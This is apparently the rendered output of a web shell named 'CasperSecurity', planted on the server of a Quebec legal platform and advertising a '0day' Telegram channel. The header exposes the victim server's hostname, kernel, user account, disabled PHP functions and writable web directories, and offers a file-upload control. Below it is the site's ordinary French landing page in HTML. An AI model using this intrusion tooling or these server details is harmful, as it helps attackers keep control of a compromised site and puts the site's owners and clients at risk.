T.ME/BIBIL_0DAY
CasperSecurity


Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/gositeme/domains/lavocat.ca/private_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/gositeme/domains/lavocat.ca/private_html/index.html
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Avocat.Quebec - La communauté juridique du Québec</title>
    <meta name="description" content="Plateforme juridique professionnelle pour avocats, clients et professionnels du droit au Québec.">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            line-height: 1.6;
            color: #333;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            min-height: 100vh;
        }
        
        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 2rem;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            text-align: center;
        }
        
        .hero {
            background: rgba(255, 255, 255, 0.95);
            padding: 3rem;
            border-radius: 20px;
            box-shadow: 0 20px 40px rgba(0, 0, 0, 0.1);
            margin-bottom: 2rem;
            backdrop-filter: blur(10px);
        }
        
        .logo {
            font-size: 3rem;
            margin-bottom: 1rem;
            color: #667eea;
        }
        
        h1 {
            font-size: 2.5rem;
            margin-bottom: 1rem;
            color: #2d3748;
            font-weight: 700;
        }
        
        .subtitle {
            font-size: 1.2rem;
            color: #4a5568;
            margin-bottom: 2rem;
            max-width: 600px;
        }
        
        .features {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 2rem;
            margin: 2rem 0;
            max-width: 800px;
        }
        
        .feature {
            background: #f7fafc;
            padding: 1.5rem;
            border-radius: 10px;
            border-left: 4px solid #667eea;
        }
        
        .feature h3 {
            color: #667eea;
            margin-bottom: 0.5rem;
            font-size: 1.1rem;
        }
        
        .feature p {
            color: #718096;
            font-size: 0.9rem;
        }
        
        .buttons {
            display: flex;
            gap: 1rem;
            flex-wrap: wrap;
            justify-content: center;
            margin-top: 2rem;
        }
        
        .btn {
            padding: 1rem 2rem;
            border: none;
            border-radius: 8px;
            font-size: 1rem;
            font-weight: 600;
            text-decoration: none;
            transition: all 0.3s ease;
            cursor: pointer;
            display: inline-flex;
            align-items: center;
            gap: 0.5rem;
        }
        
        .btn-primary {
            background: #667eea;
            color: white;
        }
        
        .btn-primary:hover {
            background: #5a6fd8;
            transform: translateY(-2px);
            box-shadow: 0 10px 25px rgba(102, 126, 234, 0.3);
        }
        
        .btn-secondary {
            background: transparent;
            color: #667eea;
            border: 2px solid #667eea;
        }
        
        .btn-secondary:hover {
            background: #667eea;
            color: white;
            transform: translateY(-2px);
        }
        
        .status {
            background: rgba(72, 187, 120, 0.1);
            color: #2f855a;
            padding: 0.5rem 1rem;
            border-radius: 20px;
            font-size: 0.9rem;
            margin-bottom: 1rem;
            border: 1px solid rgba(72, 187, 120, 0.3);
        }
        
        .footer {
            margin-top: 3rem;
            color: rgba(255, 255, 255, 0.8);
            font-size: 0.9rem;
        }
        
        @media (max-width: 768px) {
            .container {
                padding: 1rem;
            }
            
            .hero {
                padding: 2rem;
            }
            
            h1 {
                font-size: 2rem;
            }
            
            .buttons {
                flex-direction: column;
                align-items: center;
            }
            
            .btn {
                width: 100%;
                max-width: 300px;
            }
        }
        
        .loading {
            margin: 1rem 0;
            color: #718096;
        }
        
        .spinner {
            display: inline-block;
            width: 20px;
            height: 20px;
            border: 3px solid rgba(102, 126, 234, 0.3);
            border-radius: 50%;
            border-top-color: #667eea;
            animation: spin 1s ease-in-out infinite;
            margin-right: 0.5rem;
        }
        
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="hero">
            <div class="status">✅ Plateforme en ligne</div>
            <div class="logo">⚖️</div>
            <h1>Avocat.Quebec</h1>
            <p class="subtitle">
                La communauté juridique professionnelle du Québec. 
                Connectez-vous avec des avocats certifiés, gérez vos dossiers et accédez aux ressources juridiques.
            </p>
            
            <div class="features">
                <div class="feature">
                    <h3>🏛️ Avocats Certifiés</h3>
                    <p>Tous nos avocats sont vérifiés par le Barreau du Québec</p>
                </div>
                <div class="feature">
                    <h3>🌐 Service Bilingue</h3>
                    <p>Interface français-anglais pour tous les utilisateurs</p>
                </div>
                <div class="feature">
                    <h3>🔒 Sécurisé</h3>
                    <p>Confidentialité et sécurité des données garanties</p>
                </div>
                <div class="feature">
                    <h3>⚡ Temps Réel</h3>
                    <p>Chat en direct et notifications instantanées</p>
                </div>
            </div>
            
            <div class="buttons">
                <a href="/auth/signup" class="btn btn-primary">
                    👤 Créer un compte
                </a>
                <a href="/auth/signin" class="btn btn-secondary">
                    🔑 Se connecter
                </a>
            </div>
            
            <div class="loading" style="display: none;" id="loading">
                <div class="spinner"></div>
                Chargement de l'application...
            </div>
        </div>
        
        <div class="footer">
            <p>&copy; 2024 Avocat.Quebec - Tous droits réservés</p>
            <p>Plateforme juridique professionnelle du Québec</p>
        </div>
    </div>
    
    <script>
        // Function to show loading and redirect
        function navigateToApp(url) {
            document.getElementById('loading').style.display = 'block';
            setTimeout(() => {
                window.location.href = url;
            }, 500);
        }
        
        // Add click handlers
        document.addEventListener('DOMContentLoaded', function() {
            const buttons = document.querySelectorAll('.btn');
            buttons.forEach(button => {
                button.addEventListener('click', function(e) {
                    e.preventDefault();
                    navigateToApp(this.href);
                });
            });
        });
        
        // Test if React app is working
        setTimeout(() => {
            fetch('/api/health')
                .then(response => {
                    if (response.ok) {
                        console.log('✅ Application backend is running');
                    }
                })
                .catch(error => {
                    console.log('⚠️ Backend may be starting up');
                });
        }, 1000);
    </script>
</body>
</html> 

CasperSecurity Mini